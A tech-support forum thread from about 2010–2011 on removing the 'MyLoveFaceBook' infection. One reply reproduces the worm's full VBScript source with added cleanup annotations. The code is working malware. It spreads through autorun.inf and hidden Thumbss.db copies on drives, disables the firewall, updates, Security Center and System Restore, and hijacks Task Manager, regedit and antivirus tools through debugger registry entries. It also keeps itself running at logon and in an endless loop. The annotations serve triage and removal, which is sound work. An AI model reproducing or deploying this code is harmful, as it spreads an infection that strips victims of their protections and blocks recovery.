Removing my love facebook.LiuYifei@hotmail.co

November 2, 2010 at 03:32:28
Specs: Windows XP, ram 512 , intel centrino
Hi, this text has been appearing in my Internet Explorer address bar for 2 days.
How do I remove this virus?



#1
November 2, 2010 at 05:03:26
you can start by running a full scan with malwarebytes to see if that cleans it up.

Some HELP in posting on Computing.net plus free progs and instructions Cheers



#2
January 12, 2011 at 02:53:52
I faced the same problem, but I solved it by using two tools:
- Download the mseinstall and Hijack tools.
- Run the mseinstall tool; after it has finished, you have to restart your computer.
Then run Hijack and the mylovefacebook will disappear.


#3
January 20, 2011 at 06:05:40
Use MLFRT (mylovefacebook Removal Tool); it's free too, from Sergiwa.com. It removes the virus with only one click in a few seconds.
http://www.sergiwa.com/modules/mydo...


#4
January 28, 2011 at 04:09:51
Hi, I've managed to reverse engineer the VB script that causes this virus. It's usually disguised as a Thumbss.db file on USB pen drives and executed through autorun.inf.

Here is the VB script. I guess you will have to undo / restore all of these registry entries, which is best done with a freeware registry editor (the virus blocks regedit.exe from starting through the Image File Execution Options entries shown in the script).


' [analysis] Setup stage of the script. It loads its own source text into memory and
' prepares the autorun.inf content used later. Comments marked [analysis] were added
' for triage and cleanup; the author's own comments are left as found, since the
' e-mail-style marker below is itself a recognisable string for this sample.
'by : MyLoveFaceBook.LiuYiFei@Hotmail.CoM

' [analysis] From here on every runtime error is suppressed, so a failed registry
' write or a missing file never stops the script or shows an error dialog.
on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

'===================================================================================

' [analysis] Text written to autorun.inf on each drive. The shellexecute entry starts
' Wscript.exe with the VBScript engine forced (/e:vbs) on a file called Thumbss.db.
' Note the double "s": the genuine Windows thumbnail cache is named Thumbs.db.
atr = "[autorun]"&vbcrlf&"shellexecute=Wscript.exe /e:vbs Thumbss.db"

'===================================================================================

set fs = createobject("Scripting.FileSystemObject")

' [analysis] mf is the file object of the script that is currently running.
set mf = fs.getfile(Wscript.ScriptFullname)

' [analysis] WScript.Shell object used for the registry reads/writes further down.
' "reg" is not in the dim list above; there is no Option Explicit, so it still works.
set reg=createobject("WScript.Shell")

dim text,size

' [analysis] size is stored here but is not read again anywhere in this listing.
size = mf.size

' [analysis] Drive type of the drive the script was started from (1 = removable).
' The value decides at the end of the script whether it stays resident.
check = mf.drive.drivetype

' [analysis] Opens its own file for reading (1) using the system default encoding (-2).
set text=mf.openastextstream(1,-2)

' [analysis] Rebuilds the complete script text line by line, CRLF-terminated, in mysource.
do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

' [analysis] Special folder 0 is the Windows folder.
Set winpath = fs.getspecialfolder(0)

' [analysis] Resets an existing system32\baseWINDOWS.db to attribute 32 (Archive only),
' i.e. clears read-only/hidden/system. If the file does not exist yet, the resulting
' error is swallowed by "on error resume next".
set tf = fs.getfile(winpath&"\system32\baseWINDOWS.db") : tf.attributes=32

' [analysis] One-time registry changes made at start-up of the script. Every value
' written in this section is a cleanup item: each has to be deleted or set back to
' its normal data after the script process has been stopped and its files removed.
'==================================================

'this code for server

'DefaultIcon========================================

' [analysis] Copies the default icon registered for the "dbfile" class onto the
' "Vbsfile" class and sets the VBS type name to French for "database file", so
' script files are presumably displayed like database files in Explorer.
resultat = reg.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dbfile\DefaultIcon\")

reg.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat

reg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "Fichier de la base de données", "REG_SZ"

'Disable&open with majdi

' [analysis] Policy values that turn off System Restore (DisableSR = 1) and limit
' restore-point creation by the installer, removing an easy rollback path.
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"

'Services

' [analysis] Service start types: 4 = disabled, 2 = automatic.
' Disabled: SharedAccess (Windows Firewall/ICS on XP), wuauserv (Automatic Updates),
' wscsvc (Security Center). Set to automatic: usnjsvc and TlntSvr (Telnet server).
' Note the mix of CurrentControlSet and ControlSet001; check both when auditing.
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Start",4,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Start",4,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start",4,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\usnjsvc\Start",2,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\Start",2,"REG_DWORD"

' [analysis] Unlike the lines above, this path has no "\Start" suffix and no trailing
' backslash, so RegWrite creates a DWORD value named "Messenger" directly under the
' Services key instead of changing the Messenger service. The stray value is a useful
' indicator of this sample.
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Messenger",2,"REG_DWORD"

'Security Center

' [analysis] Sets the Security Center override / disable-notify values to 1 so that
' missing antivirus or firewall protection is not reported to the user.
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride",1,"REG_DWORD"

''

' [analysis] Per-user Windows Script Host settings: no logo banner and no script
' timeout, written under both the "Script Host" and "Scripting Host" key spellings.
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo",0,"REG_DWORD"

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout",0,"REG_DWORD"

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\DisplayLogo",0,"REG_DWORD"

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

' [analysis] Adds two shell verbs to the exefile class ("Scan with Anti-Trojan" and
' "Ouvrir avec...") whose command runs the dropped script instead of any scanner.
reg.regwrite "HKEY_CLASSES_ROOT\exefile\shell\Scan with Anti-Trojan\command\",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_CLASSES_ROOT\exefile\shell\Ouvrir avec...\command\",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

' [analysis] Image File Execution Options (IFEO) "Debugger" hijacks. When a Debugger
' value exists for an image name, Windows starts the debugger command instead of that
' program. Here the "debugger" is the dropped script, so starting Task Manager,
' Regedit, System Restore (rstrui), MSConfig, Process Explorer, the crash reporters
' (drwtsn32, dwwin) or the listed cleanup/antivirus tools re-runs the script and the
' tool never opens. Matching is by file name only, which is why a registry editor
' under another file name still starts. Cleanup: delete each Debugger value below.
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

' [analysis] Same IFEO mechanism for four browsers, but the replacement command is
' Internet Explorer: starting Firefox, Opera, Safari or Chrome opens IE, whose title
' and start page the script overwrites elsewhere in this listing.
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Opera.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Safari.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

' [analysis] Further IFEO hijacks, by file name, of removal and inspection tools
' (for example HijackThis.exe and autoruns.exe) and of antivirus executables.
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trjscan.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rmvtrjan.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mvyA.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutorunRemover.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LaunchU3.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Startup CP.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

' [analysis] Installs the local copy. The script text held in mysource is written to
' <Windows folder>\system32\baseWINDOWS.db, the file that the registry entries in this
' listing point wscript.exe at. Detection: a .db file in system32 that contains
' VBScript text. Cleanup: remove it only after the running wscript.exe is stopped.
'getfile

Set winpath = fs.getspecialfolder(0)

' [analysis] Attribute 32 = Archive only; clears read-only/hidden/system on an
' existing copy so that it can be overwritten.
set tf = fs.getfile(winpath & "\system32\baseWINDOWS.db")

tf.attributes = 32

' [analysis] CreateTextFile(path, overwrite, unicode): both optional arguments are
' non-zero here, so an existing file is replaced and the text is written as Unicode.
set tf=fs.createtextfile(winpath & "\system32\baseWINDOWS.db",2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & "\system32\baseWINDOWS.db")

' [analysis] Attribute 39 = ReadOnly (1) + Hidden (2) + System (4) + Archive (32).
' With the Explorer settings this script also writes, the file is not shown.
tf.attributes = 39

' [analysis] Resident loop. Each pass copies the script to every removable or fixed
' drive and then re-applies the registry settings below. When the script was started
' from a non-removable drive (check <> 1) the loop repeats every 5 seconds and never
' ends, so manual fixes to these registry values or to autorun.inf are undone until
' the wscript.exe process is ended. Task Manager itself is redirected by the Debugger
' entry that this listing writes for taskmgr.exe.
'flashdrive

do

for each flashdrive in fs.drives

' [analysis] Drive type 1 = removable, 2 = fixed; floppy drive A: is skipped.
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

' [analysis] Drops or overwrites <drive>\Thumbss.db with the script text. Attributes
' are first reset to 32 (Archive) and afterwards set to 39 (read-only+hidden+system).
set tf=fs.getfile(flashdrive.path &"\Thumbss.db")

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &"\Thumbss.db",2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &"\Thumbss.db")

tf.attributes = 39

' [analysis] Replaces <drive>\autorun.inf with the shellexecute entry held in atr,
' again hidden with attribute 39. Any existing autorun.inf on the drive is lost.
set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 39

end if

'start

next

set rg = createobject("WScript.Shell")

' [analysis] Persistence: two Run values start the dropped script at logon. The HKLM
' value is named "Adobe Reader 9.0", the HKCU value "baseWINDOWS". Both must be
' deleted during cleanup.
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Adobe Reader 9.0",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baseWINDOWS",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

' [analysis] Keeps Windows Script Host enabled machine-wide (Enabled = 1).
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled",1,"REG_DWORD"

' [analysis] NoDriveTypeAutoRun = 0 leaves no drive type excluded from AutoRun for
' this user, which is what lets the autorun.inf written above take effect.
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"

' [analysis] Explorer view settings: SHOWALL\CheckedValue is set to 0 (presumably so
' that the "show hidden files" option in Folder Options has no effect; confirm on an
' affected machine), protected system files stay hidden, and file extensions are hidden.
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"

' [analysis] The visible symptom: Internet Explorer's window title is set to the
' author's marker string and the start page is replaced.
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," (-[ MyLoveFaceBook.LiuYiFei@Hotmail.CoM ]-) "

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.site-officiel.110mb.com/"

' [analysis] Deletes the IE typed-URL history key and the machine-wide IE Toolbar key.
rg.RegDelete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\"

rg.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\"

' [analysis] Deletes HKLM Run values by name. "avast!", "AVG" and "Avira" match
' antivirus product names, so those programs would no longer start at logon.
' "winboot" and "MS32DLL" are presumably entries of other malware; not confirmed here.
rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\avast!"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\AVG"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Avira"

' [analysis] Not started from a removable drive: wait 5 seconds and repeat forever.
if check <> 1 then

Wscript.sleep 5000

end if

loop while check<>1

' [analysis] Reached only when the script ran from a removable drive (check = 1):
' after a single pass it opens an Explorer window with the script file selected.
set sd = createobject("Wscript.shell")

sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

